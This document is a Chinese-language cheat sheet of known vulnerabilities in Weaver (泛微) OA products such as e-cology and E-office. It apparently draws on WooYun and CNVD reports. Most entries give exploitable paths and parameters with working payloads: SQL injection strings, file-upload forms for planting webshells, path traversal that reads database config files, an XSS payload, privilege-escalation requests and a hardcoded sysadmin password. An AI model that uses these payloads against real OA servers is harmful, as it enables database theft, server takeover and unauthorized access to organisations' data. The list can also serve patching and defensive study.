2019年 泛微e-cology OA数据库配置信息泄漏 包括不限于8.0、9.0版本 /mobile/dbconfigreader.jsp
2019年 泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc)
2019年 泛微e-cology OA系统远程代码执行 0x02 影响范围 包括但不限于7.0,8.0,8.1 /weaver/bsh.servlet.BshServlet/
CNVD-2019-34241 /mobile/browser/WorkflowCenterTreeData.jsp 受影响版本 泛微e-cology OA系统 JSP版本 Payload: formids=11111111111))) union select NULL,value from v$parameter order by (((1
缺陷编号:wooyun-2015-0132247 漏洞标题:泛微OA办公系统一处通用SQL注入(需要登陆) 包含6.0及7.0版本 /workflow/FormBillBrowser.jsp 参数:formName 拼接sql未过滤
wooyun-2015-0137850 泛微OA系统通用任意文件上传getshell(附官方案例) 影响6.0、7.0、7.100、8.0(需要登录) /page/maint/common/UserResourceUpload.jsp?dir=/ (1)存在文件上传绕过(更改后缀:1.jsp.,1.jspx ; 0x00截断) (2)上传路径可控 payload: <form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" > <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/> <button type=submit value="getshell">getshell</button> </form>
wooyun-2015-0140003 泛微OA通用系统三处SQL注入打包(官网可复现无需登录) (1)/mobile/plugin/loadWfGraph.jsp requestid (2)//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1 nodeid (3)//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2* id
缺陷编号:wooyun-2016-0178866 漏洞标题:泛微OA某接口无需登录可执行任意SQL语句(附脚本) /ws /ws/query?wsdl XML注入
缺陷编号:wooyun-2016-0169872 漏洞标题:泛微OA某处缺陷可遍历和操作系统文件 plugin\ewe\jsp\config.jsp sUsername = "sysadmin"; sPassword = "weaversoft" (1)/plugin/ewe/admin/default.jsp 新建文件1.txt (2)越权删除文件: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../
wooyun-2015-0155705 泛微OA未授权可导致GetShell /sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp 上传马路径:/sysinterface/extpage/ccccc.jsp 路径可控: /sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp 上传马路径:http://url/ccccc.jsp
缺陷编号:wooyun-2015-0141834 漏洞标题:雨润集团泛微OA系统表单任意上传拿shell /tools/SWFUpload/upload.jsp payload: <form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" > <input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/> <button type=submit value="getshell">getshell</button> </form> 上传马路径:http://url/shell.jsp
缺陷编号:wooyun-2015-0138725 漏洞标题:泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录) /mobile/plugin/PreDownload.jsp url sql拼接未过滤
缺陷编号:wooyun-2015-0132258 漏洞标题:泛微OA系统存在SQL注入漏洞(附测试脚本) /ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= //keywordid Oracle 布尔盲注 反射型XSS:/main/login.jsp Payload: 1'"()&%<ScRiPt >prompt(930551)</ScRiPt>
缺陷编号:wooyun-2015-0129483 漏洞标题:泛微OA系统敏感文件未授权访问 /messager/users.data XML格式数据base64加密
缺陷编号:wooyun-2015-0127502 漏洞标题:泛微OA某处通用注入(不需登录) /web/WebSearchDsp.jsp?key=1 //key
缺陷编号:wooyun-2015-0125738 漏洞标题:泛微OA系统漏洞缺陷打包 SQL注入(需登陆) (1) http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5 //requestid (2) /ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018 //reftype
越权(需登陆) (1) /main/main.jsp 个人信息——》上传头像图片-》抓包捕获到get请求(该请求可在浏览器访问) /humres/base/uploadavatar.jsp?id=4022141241232(修改id即可修改他人头像) (2) /ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用户id&v=0&fieldName=isclosed //越权修改用户权限(v参数控制用户是否可以登陆-》sysuser表中isclosed字段)
存储型XSS(需登陆) 个人中心->个人信息->详细信息-》英文名称
缺陷编号:wooyun-2015-0104678 (泛微oa的e-Mobile) 漏洞标题:泛微oa某系统通用注入漏洞(5案例) 4.5,4.6版本存在注入 盲注/延迟注入 Payload: -1' OR (8705=8705) AND 'a'='a
缺陷编号:wooyun-2014-076191 漏洞标题:泛微OA漏洞集合·2(SQL注入/文件上传getshell) 0x01:SQL注入漏洞 4 处 (1) POST /general/new_mytable/content_list/ content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1 block_id=1901&body_width=1121&_= //block_id (2) /general/address/view/view_detail.php?ADD_ID=-169 UNION SELECT 1,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 //ADD_ID (3) /general/address/docenter/export_do.php?group_id=19 UNION SELECT user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16 //group_id (4) /general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1 //content_id
0x02:文件上传导致Getshell /general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID= //cvs --> php
缺陷编号:wooyun-2014-074972 漏洞标题:泛微OA漏洞集合(sql注入、未授权访问等) 0x01:越权(需登陆) (1) /general/email/new/index.php?EMAIL_ID=7 //EMAIL_ID (2) /ikernel/admin/ 0x02:SQL注入(需登陆) (1) /ikernel/admin/IK_TABLE/field/?TABLE_ID=9 //TABLE_ID 0x03:文件下载 /general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php 0x04:文件上传 /general/email/ 内部邮件-》新建邮件-》上传 “php4” shell验证:/attachment/源码中找到的部分路径/文件名.php4
缺陷编号:wooyun-2014-069288 漏洞标题:泛微OA系统通用后台几处注入(官方demo验证) (1) /systeminfo/sysadmin/sysadminEdit.jsp?id=1 //id 管理员权限 (2) //cowork/CoworkLogView.jsp?id=151 //id 普通用户权限 (3) /system/basedata/basedata_role.jsp?roleid=32 //roleid 普通用户权限 (4) //system/basedata/basedata_hrm.jsp?resourceid=3 //resourceid 普通用户权限
缺陷编号:wooyun-2013-039855 漏洞标题:泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞 (1)phpmyadmin #无需认证可登陆 (2)SQL注入 /general/news/show/read_news.php?NEWS_ID=214 and 1=2 union select 1,user(),database(),4,5,6 //NEWS_ID (3)文件下载 /inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843 /inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 (zend加密) /inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/mysql_config.ini&ATTACHMENT_ID=5402024843
(4)文件上传 我的主页-》编辑工作计划-》附件上传-》php4 shell地址:/attachment/xxx/shell.php4
缺陷编号:WooYun-2015-0124589 漏洞标题:泛微某通用系统存在SQL注入漏洞(无需登录) (1) /main/login.jsp 用户名:sysadmin' --》报错回显 抓包: /j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin' //j_username (2) /ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version|20where|20rownum|20=|201 //可查看数据库版本
wooyun-2015-0124788 1.未授权访问及任意文件遍历 /weaver/weaver.email.FileDownloadLocation?fileid=46&download=1 /weaver/weaver.file.filedownload?fileid=1 2.注入漏洞 /weaver/weaver.email.FileDownloadLocation?fileid=39&download=1(泛微OA7) //fileid
缺陷编号:WooYun-2013-038914 漏洞标题:泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell) 文件上传 分析inc/utility_all.php 的源码可知附件上传的路径为:attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME 个人日志->上传附件,查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值 从配置文件中可以知道,附件中未禁止php4格式的文件上传,因此可以直接getshell(system权限)
wooyun-2015-0124027(sql语句任意执行) /ServiceAction/com.eweaver.base.DataAction?sql=select LONGONNAME from SYSUSER where LOGONPASS = '密码(base64加密)'
applychen(wooyun-2010-034523)泛微E-office OA管理系统存在SQL注射漏洞(未找到相关信息) wooyun-2010-0137042(未找到相关信息)
缺陷编号:wooyun-2016-0215533 漏洞标题:泛微eweaver任意数据库操作 /ws/query //webservice实现类QueryServiceImplquery中的queryBy可执行数据库命令
缺陷编号:wooyun-2016-0191882 漏洞标题:泛微ecology系统所有版本SQL注入(官网为例)二 需普通用户权限 影响范围: 8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919
缺陷编号:wooyun-2016-0198158 漏洞标题:泛微ecology无需登录SQL注入2+任意文件读取 (1)sql注入 SignatureDownLoad类中 markId参数未做过滤 (2)文件读取 markPath参数可控
缺陷编号:wooyun-2016-0169453 漏洞标题:泛微协同商务系统e-cology某处SQL注入(附验证中转脚本) //services/ //XML注入
缺陷编号:wooyun-2015-0164133 漏洞标题:泛微e-office官网存在奇葩漏洞可查看注册人信息及更改产品信息 /eoffice_web/index.php?s=/admin/settings/register.html /eoffice_web/index.php?s=/admin/update/update_list.html
缺陷编号:wooyun-2015-0148980 漏洞标题:泛微某通用系统设计缺陷遍历目录并可GetShell(需登录) 1.目录遍历 //document/imp/filebrowser.jsp?dir=D:\\ 2.文件上传(需登陆) xxx/base/skin/skincreate.jsp shell路径:/css/skins/skin4/shell.jsp
缺陷编号:wooyun-2015-0141786 漏洞标题:无需登录sql注入泛微集团分权管理(e-cology)(某世界500强企业&demo复现) /login/Login.jsp?logintype=1 登陆抓包-》 /login/VerifyLogin.jsp?loginfile=/wui/theme/ecology7/page/login.jsp?templateId=41&logintype=1&gopage=&logintype=1&fontName=